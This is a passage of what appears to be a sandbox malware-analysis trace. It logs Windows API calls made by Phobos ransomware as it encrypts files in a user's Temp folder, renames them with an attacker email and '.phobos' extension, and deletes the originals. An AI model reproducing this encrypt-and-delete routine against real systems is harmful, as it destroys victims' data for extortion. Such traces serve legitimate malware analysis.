dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.989] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.989] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5oMuETnHP-S7WlfpOlSu.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5omuetnhp-s7wlfpolsu.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.990] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.990] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.990] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc624, lpOverlapped=0x0) returned 1 [0190.991] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc630, dwBufLen=0xc630 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc630) returned 1 [0190.991] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc630, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc630, lpOverlapped=0x0) returned 1 [0190.993] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.993] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.993] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0190.993] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.993] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0190.993] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.993] CloseHandle (hObject=0x14c) returned 1 [0190.993] CloseHandle (hObject=0x178) returned 1 [0190.993] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5oMuETnHP-S7WlfpOlSu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5omuetnhp-s7wlfpolsu.png")) returned 1 [0190.994] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.994] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1534) returned 1 [0190.994] CloseHandle (hObject=0x178) returned 1 [0190.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log")) returned 0x2020 [0190.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.995] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.995] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.995] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.995] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.995] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5fe, lpOverlapped=0x0) returned 1 [0190.996] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x600, dwBufLen=0x600 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x600) returned 1 [0190.996] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x600, lpOverlapped=0x0) returned 1 [0190.997] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.997] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.997] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.997] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.997] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.997] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.997] CloseHandle (hObject=0x178) returned 1 [0190.997] CloseHandle (hObject=0x14c) returned 1 [0190.997] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log")) returned 1 [0190.998] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\aM1CeQ6qf0bMMZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\am1ceq6qf0bmmz.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.999] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=42292) returned 1 [0190.999] CloseHandle (hObject=0x14c) returned 1 [0190.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\aM1CeQ6qf0bMMZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\am1ceq6qf0bmmz.mp3")) returned 0x2020 [0190.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\aM1CeQ6qf0bMMZ.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\am1ceq6qf0bmmz.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\aM1CeQ6qf0bMMZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\am1ceq6qf0bmmz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.999] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.999] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\aM1CeQ6qf0bMMZ.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\am1ceq6qf0bmmz.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.000] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0191.000] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.000] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa534, lpOverlapped=0x0) returned 1 [0191.001] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa540, dwBufLen=0xa540 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa540) returned 1 [0191.001] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa540, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa540, lpOverlapped=0x0) returned 1 [0191.002] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0191.002] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.003] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0191.003] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.003] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0191.003] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.003] CloseHandle (hObject=0x14c) returned 1 [0191.003] CloseHandle (hObject=0x178) returned 1 [0191.003] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\aM1CeQ6qf0bMMZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\am1ceq6qf0bmmz.mp3")) returned 1 [0191.004] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AwIhQOzqZyn-b_f4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\awihqozqzyn-b_f4.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.005] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1739) returned 1 [0191.005] CloseHandle (hObject=0x178) returned 1 [0191.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AwIhQOzqZyn-b_f4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\awihqozqzyn-b_f4.png")) returned 0x2020 [0191.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AwIhQOzqZyn-b_f4.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\awihqozqzyn-b_f4.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AwIhQOzqZyn-b_f4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\awihqozqzyn-b_f4.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.006] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.006] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AwIhQOzqZyn-b_f4.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\awihqozqzyn-b_f4.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0191.006] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.006] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6cb, lpOverlapped=0x0) returned 1 [0191.007] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6d0, dwBufLen=0x6d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6d0) returned 1 [0191.007] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6d0, lpOverlapped=0x0) returned 1 [0191.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0191.008] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.008] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0191.008] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.008] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0191.008] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.008] CloseHandle (hObject=0x178) returned 1 [0191.009] CloseHandle (hObject=0x14c) returned 1 [0191.009] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AwIhQOzqZyn-b_f4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\awihqozqzyn-b_f4.png")) returned 1 [0191.009] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.010] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16384) returned 1 [0191.010] CloseHandle (hObject=0x14c) returned 1 [0191.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat")) returned 0x2026 [0191.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.010] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.010] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.011] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0191.011] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.011] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4000, lpOverlapped=0x0) returned 1 [0191.445] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010, dwBufLen=0x4010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010) returned 1 [0191.446] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4010, lpOverlapped=0x0) returned 1 [0191.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0191.446] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.447] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0191.447] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0191.447] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0191.447] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.447] CloseHandle (hObject=0x14c) returned 1 [0191.447] CloseHandle (hObject=0x178) returned 1 [0191.447] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat")) returned 1 [0191.448] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0191.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CYtrY1OD2PRanit.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cytry1od2pranit.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.449] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=31687) returned 1 [0191.449] CloseHandle (hObject=0x178) returned 1 [0191.449] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CYtrY1OD2PRanit.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cytry1od2pranit.mkv")) returned 0x2020 [0191.449] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CYtrY1OD2PRanit.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cytry1od2pranit.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CYtrY1OD2PRanit.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cytry1od2pranit.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0191.449] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.449] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0191.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CYtrY1OD2PRanit.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cytry1od2pranit.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0191.450] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0191.450] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0191.450] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: 